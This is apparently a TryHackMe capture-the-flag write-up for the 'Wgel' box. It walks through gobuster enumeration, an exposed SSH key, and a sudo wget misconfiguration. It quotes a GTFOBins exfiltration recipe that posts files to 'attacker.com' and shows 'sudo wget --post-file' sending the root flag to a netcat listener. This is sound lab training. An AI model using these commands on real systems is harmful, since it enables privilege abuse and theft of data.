THM - Wegl | An ordinary day

Introduction

Can you exfiltrate the root flag?

Dunno, but since this is a easy rated box I give myself a fighting chance. Let’s begin.

Ports

nmap says we’ve got 22 (SSH) and 80 (HTTP) only.

Webserver

The homepage for the website is just the Apache default page, with one exception - a comment for Jessie. So perhaps that’s our username.

Gobuster is a place to start:

root@kali:/opt/tryhackme/wgel# gobuster dir -u http://10.10.34.196 -w /usr/share/wordlists/dirb/common.txt

This turns up one interesting directory - sitemap. Checking that we get a whole host of pages; basically an incomplete blog/business site. It’s called unapp, but that doesn’t turn up anything on searchsploit, so let’s gobuster in the sitemap directory:

root@kali:/opt/tryhackme/wgel# gobuster dir -u http://10.10.34.196/sitemap -w /usr/share/wordlists/dirb/common.txt

Doing that, we find .ssh/id_rsa. Bingo.

Jessie

Once we’ve downloaded the ssh key, we can chmod 600 it and then login:

root@kali:/opt/tryhackme/wgel# ssh -i id_rsa [email protected]

Then we run sudo -l:

jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

Wget

Jessie has got the user flag, and we can run wget as root. What can we do with that? Well, the box hint was about exfiltrating the root flag.

GTFOBins says we can exfiltrate files:

Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use –post-data to send hard-coded data.

URL=http://attacker.com/
LFILE=file_to_send
wget –post-file=$LFILE $URL

So let’s try that:

jessie@CorpOne:/$ URL=http://10.9.10.123:1234/  
jessie@CorpOne:/$ LFILE=/root/root_flag.txt  
jessie@CorpOne:/$ sudo wget --post-file=$LFILE $URL  
--2020-08-07 07:02:51--  http://10.9.10.123:1234/  
Connecting to 10.9.10.123:1234... connected.

And on the receiving end I used netcat:

root@kali:/opt/tryhackme/wgel# nc -nvlp 1234  
Ncat: Version 7.80 ( https://nmap.org/ncat )  
Ncat: Listening on :::1234  
Ncat: Listening on 0.0.0.0:1234  
Ncat: Connection from 10.10.34.196.  
Ncat: Connection from 10.10.34.196:45494.  
POST / HTTP/1.1  
User-Agent: Wget/1.17.1 (linux-gnu)  
Accept: */*  
Accept-Encoding: identity  
Host: 10.9.10.123:1234  
Connection: Keep-Alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 33  

b1b968b37519ad1daa6408188649263d

Nice.